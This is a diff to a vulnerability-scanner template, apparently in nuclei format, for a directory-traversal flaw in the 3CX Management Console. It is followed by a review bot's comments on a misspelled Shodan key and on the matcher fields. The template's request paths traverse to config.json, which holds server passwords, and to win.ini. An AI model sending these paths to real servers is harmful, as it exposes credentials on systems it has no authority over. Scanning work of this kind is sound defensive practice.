diff --git a/vulnerabilities/other/3cx-management-console.yaml b/vulnerabilities/other/3cx-management-console.yaml
index d7b65cf743..2e5ebb74f8 100644
--- a/vulnerabilities/other/3cx-management-console.yaml
+++ b/vulnerabilities/other/3cx-management-console.yaml
@@ -5,23 +5,30 @@ info:
 author: random-robbie
 severity: high
 description: Directory traversal vulnerability on 3CX Management Console.
+ reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
 metadata:
 shoda-query: http.title:"3CX Phone System Management Console"
- reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
 tags: 3cx,lfi,voip
 
 requests:
 - method: GET
 path:
 - '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
- - '{{BaseURL}}/Electron/download/windows/C:drivers\etc\hosts'
- matchers-condition: and
+ - '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
+
+ stop-at-first-match: true
+ matchers-condition: or
 matchers:
- - type: status
- status:
- - 200
- - type: regex
- regex:
- - "CfgServerPassword"
- - "acme"
+ - type: word
 part: body
+ words:
+ - "CfgServerPassword"
+ - "CfgServerAppName"
+ condition: and
+
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
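Review bot: The metadata key `shoda-query`, on the unchanged line directly under `metadata:`, is misspelled, so anything that looks the query up under `shodan-query` will presumably miss it. Since this commit already reorders the `info` block around that line, it should become `shodan-query: http.title:"3CX Phone System Management Console"`. In the matchers, the second `type: word` block has no `part`, while the first keeps `part: body`. Adding `part: body` there makes the matched scope explicit and keeps the two blocks parallel. With the status matcher removed and `matchers-condition: or`, a hit now rests on body words alone, so a short comment above each block naming the file it fingerprints (`# config.json keys` and `# win.ini section names`) would help whoever later triages a false positive.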